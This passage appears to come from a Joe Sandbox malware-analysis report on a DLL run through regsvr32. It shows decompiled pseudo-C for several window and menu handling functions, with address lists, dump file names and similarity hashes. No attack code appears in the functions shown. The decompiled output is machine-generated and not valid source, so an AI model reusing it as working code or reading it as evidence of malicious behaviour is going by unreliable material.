				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t91 = _t62;
					if(_t91 == 0) {
						break;
					}
					_t87 = GetDlgCtrlID(_t91) & 0x0000ffff;
					_t64 = E10014011(_t75, _t87, _t91, __eflags, _t91);
					__eflags = _t87 - _a12;
					if(__eflags != 0) {
						__eflags = _t87 - _a4;
						if(__eflags >= 0) {
							__eflags = _t87 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageA(_t91, 0x361, 0,  &_v40);
								}
							}
						}
					} else {
						_v8 = _t91;
					}
					_t62 = GetWindow(_t91, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E10013FEA(0, _t75, _t92, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t85 = _a20;
								_v36.left = _v36.left +  *_t85;
								_v36.top = _v36.top +  *((intOrPtr*)(_t85 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t85 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t85 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E10011DDB( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}





















                                                                                                                0x100143ed
                                                                                                                0x100143ef
                                                                                                                0x100143f3
                                                                                                                0x100143f6
                                                                                                                0x100143f9
                                                                                                                0x100143fc
                                                                                                                0x100143ff
                                                                                                                0x10014411
                                                                                                                0x10014401
                                                                                                                0x10014404
                                                                                                                0x10014405
                                                                                                                0x10014406
                                                                                                                0x10014407
                                                                                                                0x10014407
                                                                                                                0x1001441a
                                                                                                                0x10014422
                                                                                                                0x10014425
                                                                                                                0x10014434
                                                                                                                0x10014434
                                                                                                                0x10014434
                                                                                                                0x10014427
                                                                                                                0x1001442f
                                                                                                                0x1001442f
                                                                                                                0x1001443b
                                                                                                                0x10014487
                                                                                                                0x10014487
                                                                                                                0x1001448b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001444d
                                                                                                                0x10014450
                                                                                                                0x10014455
                                                                                                                0x10014458
                                                                                                                0x1001445f
                                                                                                                0x10014462
                                                                                                                0x10014464
                                                                                                                0x10014467
                                                                                                                0x10014469
                                                                                                                0x1001446b
                                                                                                                0x10014478
                                                                                                                0x10014478
                                                                                                                0x1001446b
                                                                                                                0x10014467
                                                                                                                0x1001445a
                                                                                                                0x1001445a
                                                                                                                0x1001445a
                                                                                                                0x10014481
                                                                                                                0x10014481
                                                                                                                0x10014491
                                                                                                                0x100144bd
                                                                                                                0x100144c0
                                                                                                                0x100144c2
                                                                                                                0x100144c5
                                                                                                                0x100144ca
                                                                                                                0x100144cf
                                                                                                                0x100144d3
                                                                                                                0x100144d5
                                                                                                                0x100144da
                                                                                                                0x100144e0
                                                                                                                0x100144e6
                                                                                                                0x100144ec
                                                                                                                0x100144ec
                                                                                                                0x100144ec
                                                                                                                0x100144ec
                                                                                                                0x100144ef
                                                                                                                0x100144f5
                                                                                                                0x10014500
                                                                                                                0x1001450e
                                                                                                                0x1001450e
                                                                                                                0x100144f5
                                                                                                                0x100144c5
                                                                                                                0x10014513
                                                                                                                0x10014516
                                                                                                                0x1001451b
                                                                                                                0x1001451b
                                                                                                                0x10014493
                                                                                                                0x10014496
                                                                                                                0x100144a7
                                                                                                                0x100144ad
                                                                                                                0x100144b3
                                                                                                                0x100144b6
                                                                                                                0x100144b8
                                                                                                                0x10014498
                                                                                                                0x1001449f
                                                                                                                0x1001449f
                                                                                                                0x10014496
                                                                                                                0x10014525

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1228040700-0
                                                                                                                • Opcode ID: 36d96a6004295ee8964788e3fef955f8b2bbd6967ee6e7cb077654b0102e99cd
                                                                                                                • Instruction ID: 31ad4884e3354c04f2d6a1acc6d05d77f59a758a5659da4c2f1deca1f34cf055
                                                                                                                • Opcode Fuzzy Hash: 36d96a6004295ee8964788e3fef955f8b2bbd6967ee6e7cb077654b0102e99cd
                                                                                                                • Instruction Fuzzy Hash: D841387190021ADFDF14DF94C984AEEB7B5FF09311B12816AE905AB261CB34DE81CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003DA97 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1003DA97(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t32;
				char* _t39;
				char* _t49;
				intOrPtr _t54;
				void* _t63;
				char* _t66;
				signed int _t74;
				void* _t76;

				_t63 = __edx;
				_t56 = __ecx;
				_push(4);
				E1004764D(0x10091295, __ebx, __edi, __esi);
				_t54 = __ecx;
				 *((intOrPtr*)(_t76 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 0xc8)) = 1;
				_t32 = 0x80c83b00;
				if(( *(_t76 + 0xc) & 0x00000004) != 0) {
					_t32 = 0x80c83300;
				}
				if(E10042700(_t56, 0, 0, 0x1009c448, _t32, 0x100b9964,  *((intOrPtr*)(_t76 + 8)), 0) != 0) {
					asm("sbb esi, esi");
					_t74 = ( ~( *(_t76 + 0xc) & 0x00005000) & 0xfffff000) + 0x00002000 |  *(_t76 + 0xc) & 0x00000040;
					_push(GetSystemMenu( *(_t54 + 0x20), 0));
					_t66 = E1001E527(_t54, _t56, 0, _t74, __eflags);
					__eflags = _t66;
					if(_t66 != 0) {
						DeleteMenu(_t66[4], 0xf000, 0);
						DeleteMenu(_t66[4], 0xf020, 0);
						DeleteMenu(_t66[4], 0xf030, 0);
						DeleteMenu(_t66[4], 0xf120, 0);
						L1000140B(_t76 + 0xc, E100184C0());
						 *(_t76 - 4) =  *(_t76 - 4) & 0x00000000;
						_t49 = L10001276(_t76 + 0xc, 0xf011);
						__eflags = _t49;
						if(_t49 != 0) {
							DeleteMenu(_t66[4], 0xf060, 0);
							AppendMenuA(_t66[4], 0, 0xf060,  *(_t76 + 0xc));
						}
						 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
						__eflags =  &(( *(_t76 + 0xc))[0xfffffffffffffff0]);
						L100013E3( &(( *(_t76 + 0xc))[0xfffffffffffffff0]), _t63);
						_t54 =  *((intOrPtr*)(_t76 - 0x10));
					}
					_t67 = _t54 + 0xe4;
					_t39 =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0xe4)) + 0x168))( *((intOrPtr*)(_t76 + 8)), _t74 | 0x50000000, 0xe81f);
					__eflags = _t39;
					if(_t39 != 0) {
						E1003C8A7(_t67, _t54);
						_t39 = 1;
					}
					 *(_t54 + 0xc8) =  *(_t54 + 0xc8) & 0x00000000;
					goto L4;
				} else {
					 *(_t54 + 0xc8) = 0;
					L4:
					return E10047725(_t39);
				}
			}











                                                                                                                0x1003da97
                                                                                                                0x1003da97
                                                                                                                0x1003da97
                                                                                                                0x1003da9e
                                                                                                                0x1003daa3
                                                                                                                0x1003daa5
                                                                                                                0x1003daac
                                                                                                                0x1003dab6
                                                                                                                0x1003dabb
                                                                                                                0x1003dabd
                                                                                                                0x1003dabd
                                                                                                                0x1003dadc
                                                                                                                0x1003daf9
                                                                                                                0x1003db0e
                                                                                                                0x1003db16
                                                                                                                0x1003db1c
                                                                                                                0x1003db1e
                                                                                                                0x1003db20
                                                                                                                0x1003db36
                                                                                                                0x1003db42
                                                                                                                0x1003db4e
                                                                                                                0x1003db5a
                                                                                                                0x1003db65
                                                                                                                0x1003db6a
                                                                                                                0x1003db76
                                                                                                                0x1003db7b
                                                                                                                0x1003db7d
                                                                                                                0x1003db89
                                                                                                                0x1003db98
                                                                                                                0x1003db98
                                                                                                                0x1003dba1
                                                                                                                0x1003dba5
                                                                                                                0x1003dba8
                                                                                                                0x1003dbad
                                                                                                                0x1003dbad
                                                                                                                0x1003dbbf
                                                                                                                0x1003dbc9
                                                                                                                0x1003dbcf
                                                                                                                0x1003dbd1
                                                                                                                0x1003dbe2
                                                                                                                0x1003dbe9
                                                                                                                0x1003dbe9
                                                                                                                0x1003dbd3
                                                                                                                0x00000000
                                                                                                                0x1003dade
                                                                                                                0x1003dade
                                                                                                                0x1003dae4
                                                                                                                0x1003dae9
                                                                                                                0x1003dae9

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Delete$AppendH_prolog3System
                                                                                                                • String ID:
                                                                                                                • API String ID: 1427010815-0
                                                                                                                • Opcode ID: d06b4b862f9a5b80e34edea4264a3b5332d43d1af25b555bc7d8b90be42379dd
                                                                                                                • Instruction ID: 465dc8e43b2d3f75baccc30aa32fbdcf2a0b44af295c82506afed976036a6668
                                                                                                                • Opcode Fuzzy Hash: d06b4b862f9a5b80e34edea4264a3b5332d43d1af25b555bc7d8b90be42379dd
                                                                                                                • Instruction Fuzzy Hash: 6B31D075640606BBEB21DF20CD86FAE7B65FF44754F108224FA28AE1E2CB70A910D758
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100112DC Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 77%
                                                                                                                			E100112DC(struct HDC__* _a4, RECT* _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t29;
				void* _t31;
				int _t33;
				int _t37;
				struct HDC__* _t53;

				if(L10010FF9() == 0) {
					if(_a12 != 0) {
						_v28.left = 0;
						_v28.top = 0;
						_v28.right = GetSystemMetrics(0);
						_t29 = GetSystemMetrics(1);
						_t53 = _a4;
						_v28.bottom = _t29;
						if(_t53 == 0) {
							if(_a8 == 0) {
								L16:
								_t31 = _a12(0x12340042, _t53,  &_v28, _a16);
								L17:
								L18:
								return _t31;
							}
							_t33 = IntersectRect( &_v28,  &_v28, _a8);
							L14:
							if(_t33 != 0) {
								goto L16;
							}
							L15:
							_t31 = 1;
							goto L17;
						}
						_t37 = GetClipBox(_t53,  &_v44);
						if(_t37 == 0) {
							L11:
							_t31 = 0;
							goto L17;
						}
						if(_t37 == 1) {
							goto L15;
						}
						if(GetDCOrgEx(_t53,  &_v12) == 0) {
							goto L11;
						}
						OffsetRect( &_v28,  ~(_v12.x),  ~(_v12.y));
						if(IntersectRect( &_v28,  &_v28,  &_v44) == 0) {
							goto L15;
						}
						if(_a8 == 0) {
							goto L16;
						}
						_t33 = IntersectRect( &_v28,  &_v28, _a8);
						goto L14;
					}
					_t31 = 0;
					goto L18;
				}
				return  *0x100bda2c(_a4, _a8, _a12, _a16);
			}











                                                                                                                0x100112e9
                                                                                                                0x10011308
                                                                                                                0x1001131a
                                                                                                                0x1001131d
                                                                                                                0x10011324
                                                                                                                0x10011327
                                                                                                                0x10011329
                                                                                                                0x1001132e
                                                                                                                0x10011331
                                                                                                                0x10011397
                                                                                                                0x100113b0
                                                                                                                0x100113bd
                                                                                                                0x100113c0
                                                                                                                0x100113c2
                                                                                                                0x00000000
                                                                                                                0x100113c2
                                                                                                                0x100113a1
                                                                                                                0x100113a7
                                                                                                                0x100113a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100113ab
                                                                                                                0x100113ad
                                                                                                                0x00000000
                                                                                                                0x100113ad
                                                                                                                0x1001133e
                                                                                                                0x10011340
                                                                                                                0x10011390
                                                                                                                0x10011390
                                                                                                                0x00000000
                                                                                                                0x10011390
                                                                                                                0x10011343
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011352
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011364
                                                                                                                0x1001137d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10011382
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001138c
                                                                                                                0x00000000
                                                                                                                0x1001138c
                                                                                                                0x1001130a
                                                                                                                0x00000000
                                                                                                                0x1001130a
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ad89c1ad2383fea64f5bbeb58d4f5704c501ff907167c4bf791acf07e99c9257
                                                                                                                • Instruction ID: 64355e8f9292b3fd31e2b969ec47c5052e073e656d727c24f8f41363996b1544
                                                                                                                • Opcode Fuzzy Hash: ad89c1ad2383fea64f5bbeb58d4f5704c501ff907167c4bf791acf07e99c9257
                                                                                                                • Instruction Fuzzy Hash: 44312771A0420EAFDF05CFA4CD849EEBBFCEF48284B104522F921E6414E770DA819BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003836D Relevance: 12.1, APIs: 8, Instructions: 85windowstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E1003836D(void* __eflags) {
				intOrPtr _v4;
				struct HWND__* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t30;
				struct HWND__* _t33;
				intOrPtr _t36;
				intOrPtr _t40;
				int _t41;
				intOrPtr _t43;
				void* _t44;
				void* _t52;
				signed int _t54;
				void* _t62;
				void* _t64;
				signed int _t67;
				void* _t74;

				_t74 = __eflags;
				_t67 = _t54;
				_push(_t62);
				_t30 = lstrlenA( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c));
				_t52 = 0;
				E10049170(_t62,  &(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x1c))[_t30 + 1]), 0,  *((intOrPtr*)( *((intOrPtr*)(_t67 + 0x74)) + 0x20)) - _t30 + 1);
				_t33 = GetFocus();
				_t63 =  *((intOrPtr*)(_t67 + 0x74));
				_t58 = _t67;
				_v8 = _t33;
				 *( *((intOrPtr*)(_t67 + 0x74)) + 4) = E1001B932(0, _t67, _t74);
				E10014092(0,  *((intOrPtr*)(_t67 + 0x74)), _t74);
				_t36 =  *((intOrPtr*)(_t67 + 0x74));
				if( *(_t36 + 4) != 0 && IsWindowEnabled( *(_t36 + 4)) != 0) {
					_t52 = 1;
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 0);
				}
				_t64 = E1001DD4F(_t52, _t63, _t67, 1);
				if(( *( *((intOrPtr*)(_t67 + 0x74)) + 0x34) & 0x00080000) == 0) {
					E1001628E(_t64, __eflags, _t67);
				} else {
					 *(_t64 + 0x18) = _t67;
				}
				_push( *((intOrPtr*)(_t67 + 0x74)));
				if( *((intOrPtr*)(_t67 + 0x78)) == 0) {
					_t40 = E10038356(_t58);
				} else {
					_t40 = E1003833F(_t58);
				}
				 *(_t64 + 0x18) =  *(_t64 + 0x18) & 0x00000000;
				_v4 = _t40;
				if(_t52 != 0) {
					EnableWindow( *( *((intOrPtr*)(_t67 + 0x74)) + 4), 1);
				}
				_t41 = IsWindow(_v8);
				_t81 = _t41;
				if(_t41 != 0) {
					SetFocus(_v8);
				}
				E1001B96C(_t52, _t67, _t64, _t67, _t81);
				_t43 = _v4;
				if(_t43 == 0) {
					_t44 = 2;
					return _t44;
				}
				return _t43;
			}























                                                                                                                0x1003836d
                                                                                                                0x10038372
                                                                                                                0x10038377
                                                                                                                0x1003837b
                                                                                                                0x1003838e
                                                                                                                0x10038394
                                                                                                                0x1003839c
                                                                                                                0x100383a2
                                                                                                                0x100383a5
                                                                                                                0x100383a7
                                                                                                                0x100383b0
                                                                                                                0x100383b3
                                                                                                                0x100383b8
                                                                                                                0x100383c4
                                                                                                                0x100383db
                                                                                                                0x100383dc
                                                                                                                0x100383dc
                                                                                                                0x100383e3
                                                                                                                0x100383ef
                                                                                                                0x100383f7
                                                                                                                0x100383f1
                                                                                                                0x100383f1
                                                                                                                0x100383f1
                                                                                                                0x10038400
                                                                                                                0x10038403
                                                                                                                0x1003840c
                                                                                                                0x10038405
                                                                                                                0x10038405
                                                                                                                0x10038405
                                                                                                                0x10038411
                                                                                                                0x10038417
                                                                                                                0x1003841b
                                                                                                                0x10038425
                                                                                                                0x10038425
                                                                                                                0x1003842b
                                                                                                                0x10038431
                                                                                                                0x10038433
                                                                                                                0x10038439
                                                                                                                0x10038439
                                                                                                                0x10038441
                                                                                                                0x10038446
                                                                                                                0x10038450
                                                                                                                0x10038454
                                                                                                                0x00000000
                                                                                                                0x10038454
                                                                                                                0x10038457

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,100290F5,00000104,00000000,*.*,00000000,0000F002,00000000,00000000,00000000), ref: 1003837B
                                                                                                                • _memset.LIBCMT ref: 10038394
                                                                                                                • GetFocus.USER32 ref: 1003839C
                                                                                                                • IsWindowEnabled.USER32(?), ref: 100383C9
                                                                                                                • EnableWindow.USER32(?,00000000), ref: 100383DC
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 10038425
                                                                                                                • IsWindow.USER32(?), ref: 1003842B
                                                                                                                • SetFocus.USER32 ref: 10038439
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnableFocus$Enabled_memsetlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 2950697994-0
                                                                                                                • Opcode ID: f0f1da95206798f49824e7f2f6db60fdbb87c900ded1039eee4aa50a4a0a7f24
                                                                                                                • Instruction ID: 6f38c0740e7c62932b7d44983408263edad7e6d49eecc0aa883ddb142f7e42be
                                                                                                                • Opcode Fuzzy Hash: f0f1da95206798f49824e7f2f6db60fdbb87c900ded1039eee4aa50a4a0a7f24
                                                                                                                • Instruction Fuzzy Hash: DE21AD34240B019FE712DF70CE89A2ABBE5FF44B41F1189ADFA428B661DB71E911CB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000A30D Relevance: 12.1, APIs: 8, Instructions: 69windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A30D(struct HMENU__* _a4, struct HMENU__* _a8, signed int _a12) {
				int _v4;
				int _v8;
				int _t16;
				int _t17;
				int _t19;
				int _t21;
				struct HMENU__* _t24;

				_v8 = GetMenuItemCount(_a8);
				_t16 = GetMenuItemCount(_a4);
				_t19 = _t16 - 1;
				if(_t19 >= 0) {
					do {
						_t17 = GetSubMenu(_a4, _t19);
						_t24 = _t17;
						_t21 = 0;
						if(_t24 == 0) {
							goto L14;
						}
						if(_a12 == 0) {
							if(_v8 <= 0) {
								goto L14;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								_t17 = GetSubMenu(_a8, _t21);
								if(_t17 == _t24) {
									break;
								}
								_t21 = _t21 + 1;
								if(_t21 < _v8) {
									continue;
								}
								goto L14;
							}
							_t17 = RemoveMenu(_a4, _t19, 0x400);
							goto L14;
						}
						_t17 = GetMenuItemCount(_t24);
						_v4 = _t17;
						if(_t17 <= 0) {
							goto L14;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_t17 = GetSubMenu(_t24, _t21);
							if(_t17 == _a12) {
								break;
							}
							_t21 = _t21 + 1;
							if(_t21 < _v4) {
								continue;
							}
							goto L14;
						}
						_t17 = RemoveMenu(_t24, _t21, 0x400);
						_a12 = _a12 & 0x00000000;
						L14:
						_t19 = _t19 - 1;
					} while (_t19 >= 0);
					return _t17;
				}
				return _t16;
			}










                                                                                                                0x1000a321
                                                                                                                0x1000a325
                                                                                                                0x1000a329
                                                                                                                0x1000a32a
                                                                                                                0x1000a338
                                                                                                                0x1000a33d
                                                                                                                0x1000a33f
                                                                                                                0x1000a341
                                                                                                                0x1000a345
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a34b
                                                                                                                0x1000a387
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a389
                                                                                                                0x1000a389
                                                                                                                0x1000a38e
                                                                                                                0x1000a392
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a394
                                                                                                                0x1000a399
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a39b
                                                                                                                0x1000a3a7
                                                                                                                0x00000000
                                                                                                                0x1000a3a7
                                                                                                                0x1000a34e
                                                                                                                0x1000a356
                                                                                                                0x1000a35a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a35c
                                                                                                                0x1000a35c
                                                                                                                0x1000a35e
                                                                                                                0x1000a364
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a366
                                                                                                                0x1000a36b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1000a36d
                                                                                                                0x1000a376
                                                                                                                0x1000a37c
                                                                                                                0x1000a3ad
                                                                                                                0x1000a3ad
                                                                                                                0x1000a3ad
                                                                                                                0x00000000
                                                                                                                0x1000a3b1
                                                                                                                0x1000a3b6

                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1000A31B
                                                                                                                • GetMenuItemCount.USER32(?), ref: 1000A325
                                                                                                                • GetSubMenu.USER32 ref: 1000A33D
                                                                                                                • GetMenuItemCount.USER32(00000000), ref: 1000A34E
                                                                                                                • GetSubMenu.USER32 ref: 1000A35E
                                                                                                                • RemoveMenu.USER32(00000000,00000000,00000400), ref: 1000A376
                                                                                                                • GetSubMenu.USER32 ref: 1000A38E
                                                                                                                • RemoveMenu.USER32(?,00000000,00000400), ref: 1000A3A7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
